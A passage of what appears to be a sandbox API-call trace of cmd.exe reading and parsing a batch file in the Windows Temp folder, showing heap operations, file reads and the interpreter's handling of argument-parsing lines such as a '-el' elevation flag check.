_get_osfhandle (_FileHandle=1) returned 0x24 [0175.722] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0175.724] _get_osfhandle (_FileHandle=0) returned 0x20 [0175.724] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0175.724] SetConsoleInputExeNameW () returned 0x1 [0175.724] GetConsoleOutputCP () returned 0x1b5 [0175.725] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0175.725] SetThreadUILanguage (LangId=0x0) returned 0x409 [0175.725] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x90 [0175.725] _open_osfhandle (_OSFileHandle=0x90, _Flags=8) returned 3 [0175.725] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.725] SetFilePointer (in: hFile=0x90, lDistanceToMove=3009, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xbc1 [0175.726] GetProcessHeap () returned 0x19a8f1e0000 [0175.726] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb8f0) returned 1 [0175.726] GetProcessHeap () returned 0x19a8f1e0000 [0175.726] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb860) returned 1 [0175.726] GetProcessHeap () returned 0x19a8f1e0000 [0175.726] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb9e0) returned 1 [0175.726] GetProcessHeap () returned 0x19a8f1e0000 [0175.726] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec9c0) returned 1 [0175.726] GetProcessHeap () returned 0x19a8f1e0000 [0175.727] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee190) returned 1 [0175.727] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.727] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xbc1 [0175.727] ReadFile (in: hFile=0x90, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0175.727] SetFilePointer (in: hFile=0x90, lDistanceToMove=3048, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xbe8 [0175.727] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if defined _args set _args=%_args:\"=%\r\n", cbMultiByte=39, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="if defined _args set _args=%_args:\"=%\r\nsver%\r\n============================================================================================\r\n") returned 39 [0175.727] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.727] GetFileType (hFile=0x90) returned 0x1 [0175.727] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.727] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xbe8 [0175.727] GetProcessHeap () returned 0x19a8f1e0000 [0175.728] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fdd10 [0175.728] GetProcessHeap () returned 0x19a8f1e0000 [0175.728] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f201d30 [0175.728] GetProcessHeap () returned 0x19a8f1e0000 [0175.728] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb860 [0175.728] GetEnvironmentVariableW (in: lpName="_args", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0175.728] _wcsicmp (_String1="_args", _String2="CD") returned -4 [0175.728] _wcsicmp (_String1="_args", _String2="ERRORLEVEL") returned -6 [0175.728] _wcsicmp (_String1="_args", _String2="CMDEXTVERSION") returned -4 [0175.728] _wcsicmp (_String1="_args", _String2="CMDCMDLINE") returned -4 [0175.728] _wcsicmp (_String1="_args", _String2="DATE") returned -5 [0175.728] _wcsicmp (_String1="_args", _String2="TIME") returned -21 [0175.728] _wcsicmp (_String1="_args", _String2="RANDOM") returned -19 [0175.728] _wcsicmp (_String1="_args", _String2="HIGHESTNUMANODENUMBER") returned -9 [0175.728] GetProcessHeap () returned 0x19a8f1e0000 [0175.728] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb860) returned 1 [0175.728] GetProcessHeap () returned 0x19a8f1e0000 [0175.729] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f201d30) returned 1 [0175.729] GetProcessHeap () returned 0x19a8f1e0000 [0175.729] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f201d30 [0175.729] GetProcessHeap () returned 0x19a8f1e0000 [0175.729] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f201d30) returned 1 [0175.729] GetProcessHeap () returned 0x19a8f1e0000 [0175.730] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fdd10) returned 1 [0175.730] _wcsicmp (_String1="if", _String2=")") returned 64 [0175.730] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0175.730] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0175.730] _wcsicmp (_String1="IF", _String2="if") returned 0 [0175.730] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0175.730] GetProcessHeap () returned 0x19a8f1e0000 [0175.730] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee610 [0175.730] GetProcessHeap () returned 0x19a8f1e0000 [0175.730] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x16) returned 0x19a8f1ecce0 [0175.730] GetProcessHeap () returned 0x19a8f1e0000 [0175.730] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x30) returned 0x19a8f1e09f0 [0175.730] GetProcessHeap () returned 0x19a8f1e0000 [0175.730] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1e09f0, Size=0x22) returned 0x19a8f1eb7a0 [0175.730] GetProcessHeap () returned 0x19a8f1e0000 [0175.730] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eb7a0) returned 0x22 [0175.730] _wcsicmp (_String1="defined", _String2="/I") returned 53 [0175.730] GetProcessHeap () returned 0x19a8f1e0000 [0175.730] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee310 [0175.730] GetProcessHeap () returned 0x19a8f1e0000 [0175.730] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x20) returned 0x19a8f1eb710 [0175.730] _wcsicmp (_String1="ERRORLEVEL", _String2="defined") returned 1 [0175.730] _wcsicmp (_String1="EXIST", _String2="defined") returned 1 [0175.730] _wcsicmp (_String1="CMDEXTVERSION", _String2="defined") returned -1 [0175.730] _wcsicmp (_String1="DEFINED", _String2="defined") returned 0 [0175.731] GetProcessHeap () returned 0x19a8f1e0000 [0175.731] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb950 [0175.731] GetProcessHeap () returned 0x19a8f1e0000 [0175.731] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x28) returned 0x19a8f1eb9e0 [0175.731] GetProcessHeap () returned 0x19a8f1e0000 [0175.731] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eb9e0, Size=0x1e) returned 0x19a8f1eb6b0 [0175.731] GetProcessHeap () returned 0x19a8f1e0000 [0175.731] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eb6b0) returned 0x1e [0175.731] _wcsicmp (_String1="set", _String2=")") returned 74 [0175.731] _wcsicmp (_String1="FOR", _String2="set") returned -13 [0175.731] _wcsicmp (_String1="FOR/?", _String2="set") returned -13 [0175.731] _wcsicmp (_String1="IF", _String2="set") returned -10 [0175.731] _wcsicmp (_String1="IF/?", _String2="set") returned -10 [0175.731] _wcsicmp (_String1="REM", _String2="set") returned -1 [0175.731] _wcsicmp (_String1="REM/?", _String2="set") returned -1 [0175.731] GetProcessHeap () returned 0x19a8f1e0000 [0175.731] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ede90 [0175.731] GetProcessHeap () returned 0x19a8f1e0000 [0175.731] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ecca0 [0175.731] GetProcessHeap () returned 0x19a8f1e0000 [0175.731] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x24) returned 0x19a8f1eb8f0 [0175.731] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0175.731] _tell (_FileHandle=3) returned 3048 [0175.731] _close (_FileHandle=3) returned 0 [0175.732] GetEnvironmentVariableW (in: lpName="_args", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0175.732] _wcsicmp (_String1="_args", _String2="CD") returned -4 [0175.732] _wcsicmp (_String1="_args", _String2="ERRORLEVEL") returned -6 [0175.732] _wcsicmp (_String1="_args", _String2="CMDEXTVERSION") returned -4 [0175.732] _wcsicmp (_String1="_args", _String2="CMDCMDLINE") returned -4 [0175.732] _wcsicmp (_String1="_args", _String2="DATE") returned -5 [0175.732] _wcsicmp (_String1="_args", _String2="TIME") returned -21 [0175.732] _wcsicmp (_String1="_args", _String2="RANDOM") returned -19 [0175.732] _wcsicmp (_String1="_args", _String2="HIGHESTNUMANODENUMBER") returned -9 [0175.732] _get_osfhandle (_FileHandle=1) returned 0x24 [0175.732] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0175.733] _get_osfhandle (_FileHandle=1) returned 0x24 [0175.733] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0175.734] _get_osfhandle (_FileHandle=0) returned 0x20 [0175.734] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0175.734] SetConsoleInputExeNameW () returned 0x1 [0175.734] GetConsoleOutputCP () returned 0x1b5 [0175.734] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0175.734] SetThreadUILanguage (LangId=0x0) returned 0x409 [0175.735] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x90 [0175.735] _open_osfhandle (_OSFileHandle=0x90, _Flags=8) returned 3 [0175.735] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.736] SetFilePointer (in: hFile=0x90, lDistanceToMove=3048, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xbe8 [0175.736] GetProcessHeap () returned 0x19a8f1e0000 [0175.736] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb8f0) returned 1 [0175.736] GetProcessHeap () returned 0x19a8f1e0000 [0175.736] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecca0) returned 1 [0175.736] GetProcessHeap () returned 0x19a8f1e0000 [0175.736] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ede90) returned 1 [0175.736] GetProcessHeap () returned 0x19a8f1e0000 [0175.736] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb6b0) returned 1 [0175.736] GetProcessHeap () returned 0x19a8f1e0000 [0175.736] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb950) returned 1 [0175.737] GetProcessHeap () returned 0x19a8f1e0000 [0175.737] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb710) returned 1 [0175.737] GetProcessHeap () returned 0x19a8f1e0000 [0175.737] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee310) returned 1 [0175.737] GetProcessHeap () returned 0x19a8f1e0000 [0175.737] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb7a0) returned 1 [0175.738] GetProcessHeap () returned 0x19a8f1e0000 [0175.738] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecce0) returned 1 [0175.738] GetProcessHeap () returned 0x19a8f1e0000 [0175.738] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee610) returned 1 [0175.738] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.738] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xbe8 [0175.738] ReadFile (in: hFile=0x90, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0175.738] SetFilePointer (in: hFile=0x90, lDistanceToMove=3068, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xbfc [0175.738] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if defined _args (\r\n", cbMultiByte=20, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="if defined _args (\r\n _args=%_args:\"=%\r\nsver%\r\n============================================================================================\r\n") returned 20 [0175.738] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.738] GetFileType (hFile=0x90) returned 0x1 [0175.738] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.738] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xbfc [0175.738] GetProcessHeap () returned 0x19a8f1e0000 [0175.738] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fdd10 [0175.739] GetProcessHeap () returned 0x19a8f1e0000 [0175.739] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fdd10) returned 1 [0175.739] _wcsicmp (_String1="if", _String2=")") returned 64 [0175.739] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0175.739] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0175.739] _wcsicmp (_String1="IF", _String2="if") returned 0 [0175.739] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0175.739] GetProcessHeap () returned 0x19a8f1e0000 [0175.739] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edc50 [0175.739] GetProcessHeap () returned 0x19a8f1e0000 [0175.739] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x16) returned 0x19a8f1ecde0 [0175.739] GetProcessHeap () returned 0x19a8f1e0000 [0175.739] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x30) returned 0x19a8f1e0ab0 [0175.739] GetProcessHeap () returned 0x19a8f1e0000 [0175.739] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1e0ab0, Size=0x22) returned 0x19a8f1eb980 [0175.739] GetProcessHeap () returned 0x19a8f1e0000 [0175.739] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eb980) returned 0x22 [0175.740] _wcsicmp (_String1="defined", _String2="/I") returned 53 [0175.740] GetProcessHeap () returned 0x19a8f1e0000 [0175.740] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee490 [0175.740] GetProcessHeap () returned 0x19a8f1e0000 [0175.740] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x20) returned 0x19a8f1eb9e0 [0175.740] _wcsicmp (_String1="ERRORLEVEL", _String2="defined") returned 1 [0175.740] _wcsicmp (_String1="EXIST", _String2="defined") returned 1 [0175.740] _wcsicmp (_String1="CMDEXTVERSION", _String2="defined") returned -1 [0175.740] _wcsicmp (_String1="DEFINED", _String2="defined") returned 0 [0175.740] GetProcessHeap () returned 0x19a8f1e0000 [0175.740] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb8f0 [0175.740] GetProcessHeap () returned 0x19a8f1e0000 [0175.740] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x28) returned 0x19a8f1eb7d0 [0175.740] GetProcessHeap () returned 0x19a8f1e0000 [0175.740] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eb7d0, Size=0x1e) returned 0x19a8f1eb710 [0175.740] GetProcessHeap () returned 0x19a8f1e0000 [0175.740] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eb710) returned 0x1e [0175.740] GetProcessHeap () returned 0x19a8f1e0000 [0175.740] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee790 [0175.740] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.740] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xbfc [0175.740] ReadFile (in: hFile=0x90, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efebc0, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efebc0*=0x1fff, lpOverlapped=0x0) returned 1 [0175.740] SetFilePointer (in: hFile=0x90, lDistanceToMove=3095, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xc17 [0175.741] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="for %%A in (%_args%) do (\r\n", cbMultiByte=27, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="for %%A in (%_args%) do (\r\n%_args:\"=%\r\nsver%\r\n============================================================================================\r\n") returned 27 [0175.741] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.741] GetFileType (hFile=0x90) returned 0x1 [0175.741] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.741] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc17 [0175.741] GetProcessHeap () returned 0x19a8f1e0000 [0175.741] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fdd10 [0175.741] GetProcessHeap () returned 0x19a8f1e0000 [0175.741] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f201d30 [0175.741] GetProcessHeap () returned 0x19a8f1e0000 [0175.741] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb860 [0175.741] GetEnvironmentVariableW (in: lpName="_args", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0175.741] _wcsicmp (_String1="_args", _String2="CD") returned -4 [0175.741] _wcsicmp (_String1="_args", _String2="ERRORLEVEL") returned -6 [0175.741] _wcsicmp (_String1="_args", _String2="CMDEXTVERSION") returned -4 [0175.741] _wcsicmp (_String1="_args", _String2="CMDCMDLINE") returned -4 [0175.741] _wcsicmp (_String1="_args", _String2="DATE") returned -5 [0175.741] _wcsicmp (_String1="_args", _String2="TIME") returned -21 [0175.741] _wcsicmp (_String1="_args", _String2="RANDOM") returned -19 [0175.741] _wcsicmp (_String1="_args", _String2="HIGHESTNUMANODENUMBER") returned -9 [0175.741] GetProcessHeap () returned 0x19a8f1e0000 [0175.741] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb860) returned 1 [0175.741] GetProcessHeap () returned 0x19a8f1e0000 [0175.742] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f201d30) returned 1 [0175.742] GetProcessHeap () returned 0x19a8f1e0000 [0175.742] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fdd10) returned 1 [0175.742] _wcsicmp (_String1="FOR", _String2="for") returned 0 [0175.742] _wcsicmp (_String1="FOR/?", _String2="for") returned 47 [0175.742] GetProcessHeap () returned 0x19a8f1e0000 [0175.742] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee850 [0175.742] GetProcessHeap () returned 0x19a8f1e0000 [0175.742] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4c) returned 0x19a8f1f87c0 [0175.742] GetProcessHeap () returned 0x19a8f1e0000 [0175.743] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb920 [0175.743] GetProcessHeap () returned 0x19a8f1e0000 [0175.743] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eb920, Size=0x18) returned 0x19a8f1eccc0 [0175.743] GetProcessHeap () returned 0x19a8f1e0000 [0175.743] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eccc0) returned 0x18 [0175.743] _wcsicmp (_String1="/L", _String2="%A") returned 10 [0175.743] _wcsicmp (_String1="/D", _String2="%A") returned 10 [0175.743] _wcsicmp (_String1="/F", _String2="%A") returned 10 [0175.743] _wcsicmp (_String1="/R", _String2="%A") returned 10 [0175.743] _wcsicmp (_String1="IN", _String2="in") returned 0 [0175.743] _wcsicmp (_String1="DO", _String2="do") returned 0 [0175.743] GetProcessHeap () returned 0x19a8f1e0000 [0175.743] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee0d0 [0175.743] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.743] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc17 [0175.743] ReadFile (in: hFile=0x90, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efe920, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe920*=0x1fff, lpOverlapped=0x0) returned 1 [0175.743] SetFilePointer (in: hFile=0x90, lDistanceToMove=3146, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xc4a [0175.743] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if /i \"%%A\"==\"-el\" set _elev=1\r\n", cbMultiByte=51, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="if /i \"%%A\"==\"-el\" set _elev=1\r\n=======================================================================================\r\n") returned 51 [0175.743] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.743] GetFileType (hFile=0x90) returned 0x1 [0175.743] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.743] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc4a [0175.743] GetProcessHeap () returned 0x19a8f1e0000 [0175.743] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fdd10 [0175.744] GetProcessHeap () returned 0x19a8f1e0000 [0175.744] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fdd10) returned 1 [0175.744] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0175.744] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0175.744] _wcsicmp (_String1="IF", _String2="if") returned 0 [0175.744] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0175.744] GetProcessHeap () returned 0x19a8f1e0000 [0175.744] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee9d0 [0175.744] GetProcessHeap () returned 0x19a8f1e0000 [0175.744] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x16) returned 0x19a8f1ec840 [0175.744] GetProcessHeap () returned 0x19a8f1e0000 [0175.744] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb6b0 [0175.744] GetProcessHeap () returned 0x19a8f1e0000 [0175.744] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eb6b0, Size=0x1a) returned 0x19a8f1eb860 [0175.744] GetProcessHeap () returned 0x19a8f1e0000 [0175.744] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eb860) returned 0x1a [0175.744] _wcsicmp (_String1="/i", _String2="/I") returned 0 [0175.744] GetProcessHeap () returned 0x19a8f1e0000 [0175.744] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee910 [0175.744] GetProcessHeap () returned 0x19a8f1e0000 [0175.745] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb7d0 [0175.745] _wcsicmp (_String1="ERRORLEVEL", _String2="\"%A\"") returned 67 [0175.745] _wcsicmp (_String1="EXIST", _String2="\"%A\"") returned 67 [0175.745] _wcsicmp (_String1="CMDEXTVERSION", _String2="\"%A\"") returned 65 [0175.745] _wcsicmp (_String1="DEFINED", _String2="\"%A\"") returned 66 [0175.745] _wcsicmp (_String1="NOT", _String2="\"%A\"") returned 76 [0175.745] GetProcessHeap () returned 0x19a8f1e0000 [0175.745] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb950 [0175.745] GetProcessHeap () returned 0x19a8f1e0000 [0175.745] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb740 [0175.745] _wcsicmp (_String1="set", _String2=")") returned 74 [0175.745] _wcsicmp (_String1="FOR", _String2="set") returned -13 [0175.745] _wcsicmp (_String1="FOR/?", _String2="set") returned -13 [0175.745] _wcsicmp (_String1="IF", _String2="set") returned -10 [0175.745] _wcsicmp (_String1="IF/?", _String2="set") returned -10 [0175.745] _wcsicmp (_String1="REM", _String2="set") returned -1 [0175.745] _wcsicmp (_String1="REM/?", _String2="set") returned -1 [0175.745] GetProcessHeap () returned 0x19a8f1e0000 [0175.745] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edd10 [0175.745] GetProcessHeap () returned 0x19a8f1e0000 [0175.745] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ecb80 [0175.745] GetProcessHeap () returned 0x19a8f1e0000 [0175.745] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x22) returned 0x19a8f1eb770 [0175.745] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0175.745] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.745] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) 